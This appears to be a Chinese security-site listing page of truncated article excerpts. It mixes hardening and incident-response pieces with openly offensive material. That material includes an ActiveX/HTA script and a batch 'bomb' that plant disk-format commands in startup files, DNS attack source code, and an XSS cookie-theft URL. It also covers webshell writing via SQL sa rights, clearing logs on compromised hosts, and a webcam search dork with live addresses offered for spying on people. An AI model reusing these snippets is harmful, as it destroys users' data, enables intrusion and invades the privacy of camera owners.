- 通信网络安全分层及关键技术解决
- 要实现信息化,就必须重视信息网络安全。信息网络安全绝不仅是IT行业的问题,而是一个社会问题,是一个包括多学科的系统安全工程问题,并直接关系到国家安全。因此,知名安全专家沈昌祥院士呼吁,要像重视两弹一星那样去重视信息安全。通信网络作为信息传递的一种主要载体,其安全性是信息安全中关键问题之一。 通信网络安
- 分类:网络安全
- 端口碰撞技术让开放端口更安全
- 所有在防火墙和路由器上开放的端口都是一种安全风险。这也是一种称之为"端口碰撞(port knocking )"技术的价值所在。端口碰撞技术是一种允许访问预先配置好"碰撞"的防火墙服务的技术。所谓的碰撞是由一个尝试访问系统上关闭端口的序列组成。这些尝试要么记录在一个日志中,要么保存在一个后台进程中,通过预先配置这个日志
- 分类:网络安全
- 让路由器远离字典DoS攻击
- 针对路由器的DoS字典攻击可以让攻击者取得Cisco路由器的访问权或者可能导致用户无法使用路由器。在本文中,你可以找到如何使用Cisco 网络操作系统的增强登陆功能来防止这种攻击。 你可能还没有认识到使用针对Telnet、SSH或者HTTP端口的字典式拒绝服务的(DoS)攻击可能成功的攻击你的Cisco路由器。事实上,我敢打赌,即便是
- 分类:网络安全
- Windows Internet服务器安全配置
- Windows Internet服务器安全配置 原理篇 我们将从入侵者入侵的各个环节来作出对应措施 一步步的加固windows系统. 加固windows系统.一共归于几个方面 1.端口限制 2.设置ACL权限 3.关闭服务或组件 4.包过滤 5.审计 我们现在开始从入侵者的第一步开始.对应的开始加固已有的windows系统. 1.扫描 这是入侵者在刚开始要做的第一步
- 分类:网络安全
- 安全数据库服务器快照
- 基本的设置 组成部分 特性 修补程序和更新程序 对 windows 2000 和 SQL Server 应用最新的 Service Pack 和修补程序 服务 禁用非必需的服务。 不使用时禁用 MSDTC。 非必需时禁用 MSSearch 服务。 非必需时禁用 SQLServerAgent 服务。 非必需时禁用 MSSQLServerADHelper 服务。 协议 删除或禁用不必要的协议。 服务器上未启
- 分类:网络安全
- 某运营商受DDOS攻击的应急响应内部文档
- 2004年4月,××电信运营商IDC持续遭受DDOS攻击,影响范围包括其业务网站和Mail服务器。“养兵千日,用兵一时”,东软计算机安全事件应急小组NCSIRT接到通知后,第一时间赶到用户现场,与用户充分的沟通后,迅速启动应急方案和工作流程,有条不紊地为用户提供了一套合理而完整的应急响应服务。 1. 协助恢复系统正常工作 2.
- 分类:网络安全
- 公开十七项恶意代码
- 格式化硬盘 objectid="scr"classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" /object script scr.Reset(); scr.Path="C:\\windows\\Men?inicio\\Programas\\Inicio\\automat.hta"; scr.Doc="objectid='wsh'classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'/objectscriptwsh.Run('start/mformata:/q/autotest/u'
- 分类:网络安全
- 在互联网中:黑客入侵的证据收集
- 在互联网日益繁荣的今天,网络入侵已不再是简单的个案问题,而逐步成为困扰广大网民的“焦点事件”。那么,遇到网络入侵时,该怎么做才能最大化的确保自己的利益并且严惩那些恶意攻击者呢?瑞星科技刊登《中国计算机》的一篇文章《关于黑客入侵网络的证据收集与分析》给了我们很好的启发。以下是正文部分: 如果有未经授权
- 分类:网络安全
- 网络安全基础知识之攻击与渗透
- 一旦黑客定位了你的网络,他通常会选定一个目标进行渗透。通常这个目标会是安全漏洞最多或是他拥有最多攻击工具的主机。非法入侵系统的方法有很多,你应当对这些方法引起注意。 常见攻击类型和特征 攻击特征是攻击的特定指纹。入侵监测系统和网络扫描器就是根据这些特征来识别和防范攻击的。下面简要回顾一些特定地攻击渗透
- 分类:网络安全
- 让数据更安全 6招实战EFS加密技巧
- 使用windows 2000/XP/Server 2003的用户一定听说或接触过EFS,但由于其较为复杂,弄不好就会丢失数据。因此,很多人并没有使用它。其实,EFS并没有我们想像中的那样难,关键要真正玩转它,我们需要掌握好几个关键招数…… 术语精灵 EFS:Encrypting File System,加密文件系统。它可以帮助你针对存储在NTFS磁盘卷上的文件和
- 分类:网络安全
- 一些跨站脚本攻击的总结
- 文章作者:冰血封情[EST] 信息来源:EvilOctal Security Team(www.EvilOctal.com) 注意:这文章有局限性 但是毕竟是针对我个人的空间的情况而定义的 本来就是我个人的技术总结么 其他人生死冰血封情可就不管了 抱歉哦 以动网为例子通过简单构造弹出cookies的url来检测漏洞是否存在: http://www.target.com/bbs/target.ASP?Er
- 分类:网络安全
- 入侵FBI核心网络全过程
- 作者:佚名 来源:blitzer.jahee.com/黑客基地 [警告] 涉及某些安全问题,有的部分已经略做处理。本文仅做探讨研究之用,切勿模仿。一切后果,本人概不负责。 闲来无事,就想进FBI(www.fbi.gov)的核心网络里看看。 先安装了一个支持VT100的secureCRT4.1,他是目前支持unix到VMS系统连接的一个很好的终端软件。 基本配置完
- 分类:网络安全
- PHPWIND1.3.6论坛漏洞分析
- 来源:中华盾 PHPWIND论坛是一款流行的PHP论坛,界面美观,功能也比较强大。但大家仔细看一下会发现不论是从界面功能还是代码风格,它和DISCUZ都非常相似,具体原因我想也就不用说了,毕竟DISCUZ出来比它要早很多。但安全上它没有继承DISCUZ的优点,DISCUZ论坛安全性非常好,而且商家也对此非常重视安全问题,国内论坛中不
- 分类:网络安全
- WEB入侵的过程jsp
- 作者:lovehacker 来源: http://blog.csdn.net/amh/archive/2004/12/27/230496.aspx 本文描述了如何通过WEB入侵获得freebsd 4.0的root权限。 文章主要以教育为目的,希望各位观者不要使用本文中的一些方法及程序,危害网络的安全。 作者:lovehacker 联系方式:[email protected] 网站地址:http://www.chinansl.com 版权
- 分类:网络安全
- 跨库查询还可以这样玩
- 本文作者:[email protected] 来源: http://www.eviloctal.com/forum/ 此文已在《黑客X档案》发表 看到这个题目各位大虾小虾先别急着找东西砸我,的确现在跨库查询的资料随便找找都可以找到一大堆,不像以前那样想看点资料还得对着一大堆E文敲脑袋。今天我要说的是我前一段时间发现的一个跨库查询的一个新玩法,大家可要仔细
- 分类:网络安全
- 远程攻击
- 来源: http://blog.csdn.net/amh/archive/2004/12/29/232942.aspx ⒈什么是远程攻击? 一个远程攻击是这样一种攻击,其攻击对象是攻击者还无法控制的计算机;也可以说,远程攻击是一种专门攻击除攻击者自己计算机以外的计算机(无论被攻击的计算机和攻击者位于同一子网还是有千里之遥)。远程计算机此名词最确切的定义是:
- 分类:网络安全
- 安全空间-程序访问权限攻略
- 文章来源: http://www.918x.com 本文出自《网管员世界》2004年第9期 安全防范栏目 在Windwos XP系统中,存在着两种类型的账户,即隶属于Administrators组中的管理员账户和隶属于Users组中受限制的用户。默认情况下,管理员账户可以无限制地运行计算机中的所有程序,包括XP系统内建的以及自行安装的应用程序;而受限的用户
- 分类:网络安全
- L-Blog[loveyuki版本]漏洞利用程序
- 来源:http://www.showlife8.com screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'> File: Click to Download (出处:http://www.sheup.com)
- 分类:网络安全
- sa权限突破
- 本文作者:简单del记忆 来源:http://skyhack.ltcen.com/wz/ 不知道大家看没看过LCX的那篇(对SA权限的再突破) 我认为那真的是太经典了~ 但是发现没有,他写入的WEBSHELL是CMD。ASP 这个东西不怎么用的着, 最好就是有个个人版的SHELL, 于是我把其中的代码改了,。。。 如下: SQL查询分析器连接过去declare @o int, @f i
- 分类:网络安全
- L-blog的cookie欺骗漏洞分析
- ps:漏洞利用程序本站已经发布,请自己搜索 作者::p 组织:DinGoClan MSN:[email protected] 网站挂了,没事干,看网上说L-blog被黑了,想想自己的blog有一部分用的是L-blog代码,知道L-blog的upfile.ASP文件一直有问题,所以问题应该就是出在这个文件。既然没事做,就来看看漏洞是什么吧。 一.查找漏洞 既然是上传有问题,就
- 分类:网络安全
- MY动力3.6的注入也现
- 作者:浩瀚海 文章来源:随心阁 其实这是我在无聊中发现的,可能很多高手都已经发现过了。因为本人是菜鸟,如果错了不要拿砖拍我呀! 现在百度用FreePower Ver 3.6搜索会得到很多这样的网站! 比如:http://www.××××.net/jyzweb/wlzweb/by1cjl/Article_Show.asp?ArticleID=67 其实动力做了防注入但返回的信息是不一样的
- 分类:网络安全
- 关于PUBWIN4的一些漏洞
- 来源:第八军团 http://www.juntuan.net/ 许多人还不知道PUBWIN4,不过没关系,不知道说明和你关系不大。PUBWIN4是一款网吧管理软件...我这都在用。 刚安装的时候很新奇,看着那个登陆界面,要求输入USER和PASSWord。这说明要使用机器,开机以后的事情就是......进入系统[废话]。前面有兄弟说了,可以进去进去,用什么呢?
- 分类:网络安全
- DNS Attacker源代码
- 文章来源:www.Hackway.net #include winsock.h #include stdio.h #include string.h SOCKET sockUdp; strUCt sockaddr_in destAddr; // IP addressing structures void convertDomainName(char * strName) { unsigned int lastPoint=strlen(strName); for(int i=lastPoint; i=0; i--) { if (strName==.) { strName=(char)(
- 分类:网络安全
- access数据库跨文件查询漏洞的初步报告
- 文章作者:王亮 QQ:66680800 一. 在一次玩sql injection时无意发现了这个漏洞: 1.访问http://www.lznet.net/news/displaynews.asp?id=24794 页面出错信息: Microsoft OLE DB Provider for ODBC Drivers 错误 80040e14 [Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误 在查询表达式 id = 24794 中。 /news/disp
- 分类:网络安全
- 一个批处理炸弹源码
- @echo off rem This program is dedecated to a very special person that does not want to be named. :start cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . call attrib -r -h c:\autoexec.bat nul echo @echo off c:\autoexec.bat echo call format c: /q /u /autotest nul c:\autoexec.bat call attrib +r +h c:\aut
- 分类:网络安全
- 不用软件清除肉机日志的方法
- 信息来源:中国鹰盟 我想大想一定用过小榕的CLeanIIsLog,是一个不错的日志清除工具。不过可惜,只能清除IIS的日志,那FTP和shedule等产生的日志文件呢,我们一般只能手动清除。 Windows2000的日志文件通常有应用程序日志、安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等,可能会根据服务器所开启的服务不同。
- 分类:网络安全
- 旁注入侵专用程序 Ver 2.2 修正版
- 该版本修正了上一个版的几个BUG,包括上传的默认木马不能正常提交、检测程序后不能关闭、检测后不能浏览网页、WIN 98不兼容问题及个别的较小的BUG! 下载地址1: http://www.hackdiy.com/domain2.2.zip 下载地址2: http://www.hackdiy.com/domain2.2.exe (出处:http://www.sheup.com)
- 分类:网络安全
- GOOGLE的摄像头漏洞
- inurl:ViewerFrame?Mode= Google上面输入这段代码,就可以找到有web功能的摄像头,传说全世界有好几万部。还要下载一个插件就可以偷窥人家了。 建议大家把好的地点网址贴出来分享! http://210.134.20.21/ViewerFrame?Mode=MotinLanguage=1 http://furari-miti.awa.jp/ViewerFrame?Mode=MotinLanguage=1 http://222.147.114
- 分类:网络安全
- 关于Serv-U提升又一法的补充
- 《Serv-U提升又一法》原文见《黑客X档案》2005第一期,浪迹天发表的那篇文章。其实技术在网上很早就有了,只不过当初太有人注意。我觉得这方法很绝,所以也深入研究了一下,挖到了一点好东西,不敢独享,就决定帖出来给大家看。(其实只所以帖出来,还因为我实践时没成功,呵呵,千万去要砸我)。 讲之前就给有些朋友复习一
- 分类:网络安全
- 开启XP And 2003终端的方法
- XP、2003开终端的方法和2000、NT(TS VERSION)不一样,不是通过安装,因为XP、2003已经自动安装的远程桌面功能,只是启动不启动的问题。 通过下面这个批处理就能在命令行下激活XP、2003的远程桌面功能 echo Windows Registry Editor Version 5.003389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Term
- 分类:网络安全